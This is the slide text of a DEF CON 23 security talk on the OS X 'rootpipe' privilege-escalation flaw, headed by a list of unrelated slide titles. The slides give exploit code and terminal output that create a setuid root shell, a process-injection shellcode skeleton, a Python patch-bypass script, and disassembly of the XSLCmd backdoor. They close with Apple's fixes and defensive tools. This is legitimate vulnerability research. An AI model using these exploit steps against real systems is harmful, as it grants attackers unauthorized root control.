"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
 
Artificial Intelligence and Electronic Warfare
Artificial Intelligence and Electronic WarfareArtificial Intelligence and Electronic Warfare
Artificial Intelligence and Electronic Warfare
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 

DEF CON 23: Stick That In Your (root)Pipe & Smoke It

  • 1. @patrickwardle STICK THAT IN YOUR (ROOT)PIPE & SMOKE IT
  • 2. “leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints” WHOIS @patrickwardle     always looking for more experts!
  • 3. xpc, rootpipe, malware, patches & 0days :) OUTLINE overview of XPC the bug in malware patch bypasspatch(es)
  • 4. Credits hax0ring is rarely an individual effort Ian Beer Emil Kvarnhammar Pedro Vilaça uncovered rootpipe Jonathan Levin "Mac OS X & iOS Internals" @emilkvarnhammar @osxreverser
  • 5. implants backdoor remotely accessible means of providing secret control of device injection coercing a process to load a module persistent malicious code hooking intercepting function calls trojan malicious code that masquerades as legitimate gotta make sure we’re all on the same page ;) SOME DEFINITIONS
  • 7. a simple IPC mechanism which can provide security & robustness XPC “There are two main reasons to use XPC: privilege separation and stability.” -apple.com sandboxed 'XPC services' [privilege separation]
 [stability] each XPC service has its own sandbox crashes in the XPC services don't affect the app
  • 8. used all over the place by Apple XPC IN OS X $  find  /System/Library/Frameworks  -­‐name  *.xpc   AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.FaceTimeService.xpc   AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.MapLauncher.xpc   ...   WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.32.xpc   WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.64.xpc   WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc   
 $  find  /Applications  -­‐name  *.xpc
 iPhoto.app/Contents/XPCServices/com.apple.PhotoApps.AVCHDConverter.xpc   iPhoto.app/Contents/XPCServices/com.apple.photostream-­‐agent.VideoConversionService.xpc
 Xcode.app/Contents/Developer/Toolchains/.../XPCServices/SourceKitService.xpc   Xcode.app/Contents/XPCServices/com.apple.dt.Xcode.Playground.xpc   ... frameworks and apps that use XPC frameworks apps }
  • 9. moving 'risky' code out-of-proc XPC display (uiI) } an 'unzip' XPC service a 'download' XPC service separate procs. w/ permissions 'normal' app XPC'd app allow deny deny deny XPC download, unzip, & display
  • 10. the app, comms, & xpc service XPC COMPONENT RESPONSIBILITIES XPC'd app XPC serviceXPC comms make connection send requests (msgs) listen authenticate (optionally) handle requests"Creating XPC Services" -apple.com
  • 11. simply add a new target ('xpc service') in your app's project ADDING AN XPC SERVICE creating the XPC service embedded in apptarget compile
  • 12. how to listen for client connections XPC SERVICE LISTENER int  main(int  argc,  const  char  *argv[])  {                    //set  up  NSXPCListener  for  this  service          NSXPCListener  *listener  =  [NSXPCListener  serviceListener];                    //create/set  delegate          listener.delegate  =  [ServiceDelegate  new];                    //resuming  serviceListener  to  starts  service          [listener  resume];             }   @implementation  ServiceDelegate
 //where  NSXPCListener  configures,  accepts,  &  resumes  incoming  NSXPCConnection   -­‐(BOOL)listener:(NSXPCListener  *)listener  shouldAcceptNewConnection:(NSXPCConnection*)newConnection  {                    //configure  the  connection,  by  setting  interface  that  the  exported  object  implements          newConnection.exportedInterface  =  [NSXPCInterface  interfaceWithProtocol:@protocol(imgXPCServiceProtocol)];                    //set  the  object  that  the  connection  exports          newConnection.exportedObject  =  [imgXPCService  new];                    //resume  connection          [newConnection  resume];                    //'YES'  means  connection  accepted          return  YES;   } listening & accepting XPC connection(s) template code in main.m
  • 13. @interface  imgXPCService  :  NSObject  <imgXPCServiceProtocol>   @end   @implementation  imgXPCService   //'remote'  XPC  method   -­‐(void)downloadImage:(NSURL  *)imageURL  withReply:(void  (^)(NSData  *))reply   {          //download  image          NSData*  imageData  =  [[NSData  alloc]  initWithContentsOfURL:imageURL];                    //reply  to  app          reply(imageData);   }   XPC SERVICE METHOD XPC'd app XPC service invoke method implement the desired logic
  • 14. //make  connection   //  -­‐>note:  'com.synack.imgXPCService'  is  name  of  service   NSXPCConnection*  connectionToService  =
  [[NSXPCConnection  alloc]  initWithServiceName:@"com.synack.imgXPCService"];   //set  interface  (protocol)   connectionToService.remoteObjectInterface  =    [NSXPCInterface  interfaceWithProtocol:@protocol(imgXPCServiceProtocol)];   //resume   [connectionToService  resume];   @end look up by name, set interface, and go! CONNECTING/USING THE XPC SERVICE XPC'd app //invoke  remote  method   [[connectionToService  remoteObjectProxy]  downloadImage:@"http://synack.com/logo.png"                                                                                            withReply:^(NSData*  imgData)   {          //got  downloaded  image          NSLog(@"got  downloaded  image  (size:  %#lx)",  imgData.length);   }];   connect to xpc service invoke 'remote' method(s) XPC system will find service by name
  • 16. from past to present... A 'ROOTPIPE' TIMELINE 10/2014 4/2015 discovery by Emil 8/2014 XSLCMD malware* OS X 10.10.3 'patched' 4/20152001 OS X 10.0? phoenix exploit on 10.10.3 6/2015 OS X 10.10.4 patched *reported, exploit only uncovered 4/15
  • 17. the 'writeconfig' xpc service can create files.... THE HEART OF THE VULNERABILITY //get  default  file  manager   NSFileManager*  fileMgr  =  [NSFileManager  defaultManager];
 //create  file
 [fileMgr  createFileAtPath:<path>  contents:<contents>  attributes:<attrs>]; 'source' code async  block  invoked  from  within   -­‐[WriteConfigDispatch  createFileWithContents:path:attributes:_withAuthorization:]   
 mov          rdx,  [rbx+20h]    ;  file  path   mov          rcx,  [rbx+28h]    ;  file  contents   mov          r8,  [rbx+30h]      ;  file  attributes   mov          rsi,  cs:selRef_createFileAtPath_contents_attributes_  ;  method   mov          rdi,  r14                ;  file  manager   call        cs:_objc_msgSend_ptr disassembly 'writeconfig' XPC service problem?
  • 18. anyone can create any file, anywhere as root! THE HEART OF THE VULNERABILITY $  ps  aux  |  grep    writeconfig  
  root      /System/Library/PrivateFrameworks/SystemAdministration.framework/XPCServices/writeconfig.xpc           'writeconfig' runs as r00t //create file
 [fileMgr createFileAtPath:<path> contents:<contents> attributes:<attrs>]; } the file path, contents, & permissions are fully controllable - allowing an unprivileged attacker to create files (as r00t), anywhere on the system! + =+ path contents attributes root!
  • 19. an overview example EXPLOITATION writeconfig XPC service $  ls  -­‐lart  /myShell   -­‐rwsrwxrwx    1  root    wheel    /myShell   $  /myShell   #  whoami   root SystemAdministration framework {/bin/ksh, 04777, /myShell} XPC request./r00tpipe myShell result: /bin/ksh, setuid'd
  • 20. (local) object that knows how to talk to the 'writeconfig' XPC service OBTAIN INSTANCE OF 'WRITECONFIGCLIENT' ___33__WriteConfigClient_sharedClient__block_invoke   ...   mov          rdi,  cs:classRef_WriteConfigClient   mov          rsi,  cs:selRef_alloc   mov          rbx,  cs:_objc_msgSend_ptr   call        rbx  ;  _objc_msgSend   mov          rsi,  cs:selRef_init   mov          rdi,  rax   call        rbx  ;  _objc_msgSend +[WriteConfigClient sharedClient] disassembly link w/ SystemAdministration framework //get  class   Class  WriteConfigClient  =  NSClassFromString(@"WriteConfigClient");    
 //get  instance         id  sharedClient  =  [WriteConfigClient  performSelector:@selector(sharedClient)];           SystemAdministration framework
  • 21. allows vulnerability to be triggered AUTHENTICATE TO THE WRITECONFIG XPC SERVICE ;-­‐[WriteConfigClient  authenticateUsingAuthorization:]   ...
 mov          rdi,  cs:classRef_NSXPCConnection   mov          rsi,  cs:selRef_alloc   call        cs:_objc_msgSend_ptr   mov          rsi,  cs:selRef_initWithServiceName   lea          rdx,  cfstr_Com_apple_sy_1   mov          rdi,  rax   call        cs:_objc_msgSend_ptr //authenticate   [sharedClient  performSelector:@selector(authenticateUsingAuthorizationSync:)  withObject:nil]; ;-­‐[WriteConfigClient  authenticateUsingAuthorization:]   mov          rbx,  [r15+r14]   mov          rdi,  cs:classRef_NSXPCInterface   mov          rdx,  cs:protocolRef_XPCWriteConfigProtocol   mov          rsi,  cs:selRef_interfaceWithProtocol_   call        cs:_objc_msgSend_ptr   mov          rsi,  cs:selRef_setRemoteObjectInterface_   mov          rdi,  rbx   mov          rdx,  rax   call        cs:_objc_msgSend_ptr   mov          rsi,  cs:selRef_resume   call        cs:_objc_msgSend_ptr inits connection to 'writeconfig' XPC service ('com.apple.systemadministration.writeconfig') which in turn triggers invocation of listener: shouldAcceptNewConnection:
  • 22. allows for (indirect) invocation of remote methods GET 'DISPATCH' OBJECT //get  remote  proxy  object   id  dispatchObj  =  [sharedClient  performSelector:@selector(remoteProxy)]; #  lldb  r00tPipe   b  -­‐[WriteConfigClient  remoteProxy]   Breakpoint  1:  where  =  SystemAdministration`-­‐[WriteConfigClient  remoteProxy]   thread  return   po  $rax   <WriteConfigOnewayMessageDispatcher:  0x60000000bb10> WriteConfigOnewayMessageDispatcher what object type? dispatch object identification
  • 23. finally - coerce the remote xpc service to create any file INVOKE 'REMOTE' METHOD //invoke  remote  object   [dispatchObj  createFileAtPath:<path>  contents:<contents>  attributes:<attrs>]; forwardInvocation: selector += '_withAuthorization:' WriteConfigClient (sharedClient) remoteObjectProxy _NSXPCDistantObject invokeWithTarget: <NSInvocation:  0x60000046e240>   return  value:  {Vv}  void   target:  {@}          0x60000000c3c0   selector:  {:}      createFileWithContents:                                  path:attributes:_withAuthorization:   argument  2:  {@}  0x6000000511c0   argument  3:  {@}  0x600000083ed0   argument  4:  {@}  0x6000000743c0   argument  5:  {@}  0x0 WriteConfig XPC service attacker's payload
  • 24. 'pls create me a root shell' COMBINED EXPLOIT $  ./rootPipe     step  0x1:  got  instance  <WriteConfigClient:  0x7f824141e670>   step  0x2:  authenticated  against  XPC  service   step  0x3:  got  instance  <WriteConfigOnewayMessageDispatcher:  0x7f8241433610>   step  0x4:  invoking  remote  XPC  method  to  create  /myShell  with  setuid  flag   $  /myShell     #  whoami   root #  fs_usage  -­‐f  filesystem   <rootPipe>   open                            F=4        (R_____)    /bin/ksh   read                            F=4        B=0x154780   <writeconfig>   open                            F=4        (RWC__E)    /.dat014a.00b   write                          F=4        B=0x154780   rename                                                          /.dat014a.00b   chmod                          <rwsrwxrwx>            /myShell             chown                                                            /myShell     exploit & OS's file I/O rootpipe exploit
  • 25. only exploitable by admin users NOTE ON OLDER VERSIONS //use  'Authenticator'  class   id  authenticator  =  [Authenticator  performSelector:@selector(sharedAuthenticator)];   //authenticate  with  non-­‐NULL  auth  object   [authenticator  performSelector:@selector(authenticateUsingAuthorizationSync:)  withObject:auth]; //use  'ToolLiaison'  class   id  sharedLiaison  =  [ToolLiaison  performSelector:@selector(sharedToolLiaison)];   //get  'tool'  object   id  tool  =  [sharedLiaison  performSelector:@selector(tool)];   //get  'tool'  object   [tool  createFileWithContents:  ...] authentication requires and auth object file creation via ToolLiaison class //or  directly  via  via  'UserUtilities'     [UserUtilities  createFileWithContents:  ...]; will fail for non-Admins file creation via UserUtilities class }either
  • 26. CHINA ALREADY KNEW malware with an 0day!? "somebody"
  • 27. provides reverse shell, screen capture & keylogging OSX/XSLCMD Forced to Adapt: XSLCmd Backdoor Now on OS X
 
 “a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems” -fireeye.com (9/2014) reverse shell screen capture keylogging no mention of any priv-esc exploit(s)
  • 28. did the malware exploit rootpipe as an 0day!? OSX/XSLCMD & ROOTPIPE tweet: 4/2015 why no mention in FireEye's report!? OSX/XSLCmd XSLCmd on VirusTotal
  • 29. used to turn on access for 'assistive devices' to enable keylogging! OSX/XSLCMD EXPLOITING ROOTPIPE (OS X 10.7/10.8) void  sub_10000c007()   r12  =  [Authenticator  sharedAuthenticator];   rax  =  [SFAuthorization  authorization];   rbx  =  rax;   rax  =  [rax  obtainWithRight:"system.preferences"  flags:0x3  error:0x0];   if  (rax  !=  0x0)  {        [r12  authenticateUsingAuthorizationSync:rbx];        rax  =  [r12  isAuthenticated];        if  (rax  !=  0x0)  {              rbx  =  [NSDictionary  dictionaryWithObject:@(0x124)  forKey:*_NSFilePosixPermissions];              rax  =  [NSData  dataWithBytes:"a"  length:0x1];              rax  =  [UserUtilities  createFileWithContents:rax  path:@"/var/db/.AccessibilityAPIEnabled"  attributes:rbx];                                                         download sample: objective-see.com keylogging a .AccessibilityAPIEnabled = XSLCmd disassembly enabling access (via UI)
  • 31. upgrade or 'die' FAIL #1: NO PATCH < OS X 10.10 “Apple indicated that this issue required a substantial amount of changes on their side, and that they will not back port the fix to 10.9.x and older” -Emil 'patched' OS X Yosemite (v. 10.10.3) no (official) patch for OS X Mavericks & older = "How to fix rootpipe in Mavericks" (Luigi) @osxreverser
  • 32. TL;DR: (attempt) to only allow authorized clients APPLE'S ROOTPIPE PATCH XPC comms writeconfig XPC service access check on clients unauthorized (non-apple) 'clients' can no longer connect to the remote writeconfig XPC service
  • 33. implementation overview APPLE'S ROOTPIPE PATCH “The new (patched) version implements a new private entitlement called com.apple.private.admin.writeconfig. 
 If the binary calling the XPC service does not contain this entitlement then 
 it can’t connect anymore to the XPC.” @osxreverser NSXPCListenerDelegate allow's XPC server to allow/deny connection
  • 34. decompilation of listener:shouldAcceptNewConnection PATCH DETAILS -­‐[WriteConfigDispatch  listener:shouldAcceptNewConnection:]   (NSXPCListener  *listener,  NSXPCConnection*  newConnection)   //get  audit  token   rbx  =  SecTaskCreateWithAuditToken(0x0,  listener);   //try  grab  "com.apple.private.admin.writeconfig"  entitlement   r13  =  SecTaskCopyValueForEntitlement(rbx,  @"com.apple.private.admin.writeconfig",  0x0);   //missing  entitlement?   if  (r13  ==  0x0)  goto  error;   //  -­‐>error  out,  disallowing  connection   error:      NSLog(@"###  Access  denied  for  unentitled  client  %@",  rbx); (new) entitlement checks } entitlements confer specific capabilities or security permissions embedded in the code signature, as an entitlement blob checks for com.apple.private.admin.writeconfig
  • 35. ...the XPC service is still there FAIL #2: PATCH IS MERELY A ROAD BLOCK video
  • 37. successfully (re)connect to the protected XPC service THE GOAL authentication is 100% dependent on entitlements, can we simply coerce a legitimate (entitled) binary to execute untrusted code? } infection? injection? hijacking? plugins? connect = win! entitlements?
  • 38. can required entitlement be 'faked'? FAKE ENTITLEMENTS load-time binary verification taskgated-­‐helper:  validated  embedded  provisioning  profile:                          entitlements.app/Contents/embedded.provisionprofile   taskgated-­‐helper:  unsatisfied  entitlement  com.apple.private.admin.writeconfig   taskgated-­‐helper:  killed  com.synack.entitlementsApp  because  its  use  of  the                                        com.apple.private.admin.writeconfig  entitlement  is  not  allowed   manually added entitlement nope: the OS (taskgated) validates entitlements killed by taskgated
  • 39. scan entire file system for com.apple.private.admin.writeconfig FIND 'ENTITLED' BINARIES #recursively  walk  (starting  at  r00t)   for  root,  dirnames,  filenames  in  os.walk('/'):   #check  all  files    for  filename  in  filenames:   
        #check  for  entitlements          output  =  subprocess.check_output(            ['codesign',  '-­‐d',  '-­‐-­‐entitlements',  '-­‐',  os.path.join(root,  filename)])          #check  for  entitlement  key          if  '<key>com.apple.private.admin.writeconfig</key>'  in  output:        #found!  :)                   #  python  findEntitled.py   /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder   /System/Library/CoreServices/Setup  Assistant.app/Contents/MacOS/Setup  Assistant                                                     /System/Library/CoreServices/Applications/Directory  Utility.app/Contents/MacOS/Directory  Utility   ... entitled binaries
  • 40. can a entitled binary be infected/patched? INFECTION Process:                  Directory  Utility  [1337]   Path:                        Directory  Utility.app/Contents/MacOS/Directory  Utility   Exception  Type:    EXC_CRASH  (Code  Signature  Invalid)   Exception  Codes:  0x0000000000000000,  0x0000000000000000 nope: loader verifies all digital signatures! killed by the loader load-time binary verification
  • 41. can DYLD_INSERT_LIBRARIES be (ab)used? LOAD-TIME INJECTION $  DYLD_INSERT_LIBRARIES=rootPipe.dylib  Directory  Utility.app/Contents/MacOS/Directory  Utility //for  restricted  binaries,  delete  all  DYLD_*  and  LD_LIBRARY_PATH  environment  variables   static  void  pruneEnvironmentVariables(const  char*  envp[],  const  char***  applep)   {        int  removedCount  =  0;        const  char**  d  =  envp;        for(const  char**  s  =  envp;  *s  !=  NULL;  s++)  {            if(strncmp(*s,  "DYLD_",  5)  !=  0)         *d++  =  *s;                else          ++removedCount;          }                if  (removedCount  !=  0){              dyld::log("dyld:  DYLD_  environment  variables  being  ignored  because  ");                switch  (sRestrictedReason)  {                    case  restrictedByEntitlements:                          dyld::log("main  executable  (%s)  is  code  signed  with  entitlementsn",  sExecPath);     nope: loader ignores DYLD_ env. vars for entitled binaries Mach-O loader & DYLD_ environment vars
  • 42. can dylib hijacking be (ab)used? DYLIB HIJACKING nope: no vulnerable apps are entitled white paper
 www.virusbtn.com/dylib 'hijackable' apps more info
  • 43. can code be injected into a entitled process? RUN-TIME INJECTION //shellcode  (here:  x86_64)   char  shellCode[]  =            "x55"                                                      //  pushq    %rbp            "x48x89xe5"                                      //  movq      %rsp,  %rbp          ....
 //1:  get  task  for  pid   task_for_pid(mach_task_self(),  pid,  &remoteTask);
 
 //2:  alloc  remote  stack/code
 mach_vm_allocate(remoteTask,  &remoteStack64,  STACK_SIZE,  VM_FLAGS_ANYWHERE);
 mach_vm_allocate(remoteTask,  &remoteCode64,  sizeof(shellCode),  VM_FLAGS_ANYWHERE);
 
 //3:  copy  code  into  remote  proc
 mach_vm_write(remoteTask,  remoteCode64,  (vm_address_t)shellCode,  sizeof(shellCode));
 
 //4:  make  remote  code  executable
 vm_protect(remoteTask,  remoteCode64,  sizeof(shellCode),  FALSE,  VM_PROT_READ|VM_PROT_EXECUTE);
 //5:  init  &  start  remote  thread
 remoteThreadState64.__rip  =  (u_int64_t)  (vm_address_t)  remoteCode64;   remoteThreadState64.__rsp  =  (u_int64_t)  remoteStack64;   remoteThreadState64.__rbp  =  (u_int64_t)  remoteStack64;
 
 thread_create_running(remoteTask,  x86_THREAD_STATE64,  (thread_state_t)&remoteThreadState64,                                                    x86_THREAD_STATE64_COUNT,  &remoteThread); nope: task_for_pid() requires r00t run-time process injection
  • 44. can (app-specific) plugins be (ab)used? EVIL PLUGINS maybe!? Directory Utility appears to support plugins #  codesign  -­‐d  -­‐-­‐entitlements  -­‐  /System/Library/CoreServices/Applications/Directory  Utility.app/ Contents/MacOS/Directory  Utility     <?xml  version="1.0"  encoding="UTF-­‐8"?>   <!DOCTYPE  plist  PUBLIC  "-­‐//Apple//DTD  PLIST  1.0//EN"  "http://www.apple.com/DTDs/ PropertyList-­‐1.0.dtd">   <plist  version="1.0">   <dict>     <key>com.apple.private.admin.writeconfig</key>     <true/>   </dict>   </plist> Directory Utility Plugins
  • 45. can app-specific plugin loading be abused? EVIL PLUGINS #  fs_usage  -­‐w  -­‐f  filesystem       open      (R_____)    /System/Library/CoreServices/Applications/Directory  Utility.app/Contents/PlugIns/ NIS.daplug/Contents/MacOS/NIS     open      (R_____)    /System/Library/CoreServices/Applications/Directory  Utility.app/Contents/PlugIns/ LDAPv3.daplug/Contents/MacOS/LDAPv3     open      (R_____)    /System/Library/CoreServices/Applications/Directory  Utility.app/Contents/PlugIns/ Active  Directory.daplug/Contents/MacOS/Active  Directory   ... void  -­‐[PluginController  loadPlugins]     {          rax  =  [NSBundle  mainBundle];          rax  =  [rax  builtInPlugInsPath];          [self  loadPluginsInDirectory:rax];    return;   }   install an evil plugin? Directory Utility loading its plugins
  • 46. simply copy in a plugin to 'install' & get loaded INSTALL THE PLUGIN (AS ROOT) plugin installed auth prompt :( but...plugin does get loaded!
  • 47. so close, but still so far? or.... TO RECAP The entitled 'Directory Utility' app will load (unsigned) plugins, which then can authenticate with the WriteConfig XPC service! but don't you need root to install plugin? owned by root :( ...but we can change that! #gameover
  • 48. rootpipe reborn on OS X 10.10.3 PHOENIX, IN 1, 2, 3 copy Directory Utility to /tmp to gain write permissions copy plugin (.daplugin) into Directory Utility's internal plugin directory execute Directory Utility XPC request evil plugin attacker's payload authenticates WriteConfig XPC service Dir. Utility $  ls  -­‐lart  /private/tmp   drwxr-­‐xr-­‐x    patrick    wheel  Directory  Utility.app
  • 49. #trigger  rootpipe  on  OS  X  10.10.3   def  phoenix():      #copy  Directory  Utility.app  to  /tmp      #  -­‐>this  folder  is  (obv)  accessible  to  all      shutil.copytree(DIR_UTIL,  destination)      #copy  evil  plugin  into  app's  internal  plugin  directory      #  -­‐>since  app  is  in  /tmp,  this  will  now  succeed      shutil.copytree('%s'  %  (ROOTPIPE_PLUGIN),  '%s/%s/%s'  %  (destination,  DIR_UTIL_PLUGINS,  ROOTPIPE_PLUGIN))      #exec  Directory  Utility.app      #  -­‐>will  trigger  load  of  our  unsigned  bundle  (Phoenix.daplug)      #      the  bundle  auth's  with  'WriteConfigClient'  XPC  &  invokes  createFileWithContents:path:attributes:      #      since  Directory  Utility.app  contains  the  'com.apple.private.admin.writeconfig'  entitlement,  we're  set  ;)      os.system('open  "%s"  &'  %  destination)                   if only all priv-esc bugs where this easy! PHOENIX.PY phoenix python script
  • 50. take 2 ->m0ar checks APPLE'S FIX: CVE-2015-3673 OS X 10.10 OS X 10.10.3 OS X 10.10.4  listener:shouldAcceptNewConnection:
  • 51. improved authentication & location checks APPLE FIX: CVE-2015-3673 new entitlements com.apple.private.admin.writeconfig.voiceover location checks binary in /System "The problem of their fix is that there are at least some 50+ binarie [sic] using it. A single exploit in one of them and the system is owned again because there is no fundamental fix inside writeconfig" -@osxreverser } com.apple.private.admin.writeconfig.enable-sharing binary in /usr }
  • 52. OS X DEFENSE keeping your mac secure
  • 53. free OS X tools & malware samples OBJECTIVE-SEE malware samples :) KnockKnock BlockBlock TaskExplorer
  • 54. KNOCKKNOCK UI detecting persistence: now an app for that! KnockKnock (UI)
  • 55. KNOCKKNOCK UI VirusTotal integration detect submit rescan results VirusTotal integrations
  • 56. BLOCKBLOCK a 'firewall' for persistence locations status bar BlockBlock, block blocking :) HackingTeam's OS X implant "0-day bug hijacks Macs" (payload)
  • 57. TASKEXPLORER explore all running tasks (processes) filters signing virus total dylibs files network
  • 58. CONCLUSIONS …wrapping this up OS X security, is often quite lame! XPC interfaces malware patches } audit all thingz!
  • 59. QUESTIONS & ANSWERS patrick@synack.com @patrickwardle feel free to contact me any time! "What if every country has ninjas, but we only know about the Japanese ones because they’re rubbish?" -DJ-2000, reddit.com final thought ;) syn.ac/defconRootPipe }
  • 60. credits - thezooom.com - deviantart.com (FreshFarhan) - http://th07.deviantart.net/fs70/PRE/f/2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg 
 - iconmonstr.com - flaticon.com - https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x - https://reverse.put.as/2015/04/13/how-to-fix-rootpipe-in-mavericks-and-call-apples-bullshit-bluff- about-rootpipe-fixes/ - http://www.objc.io/issues/14-mac/xpc/ - https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again images resources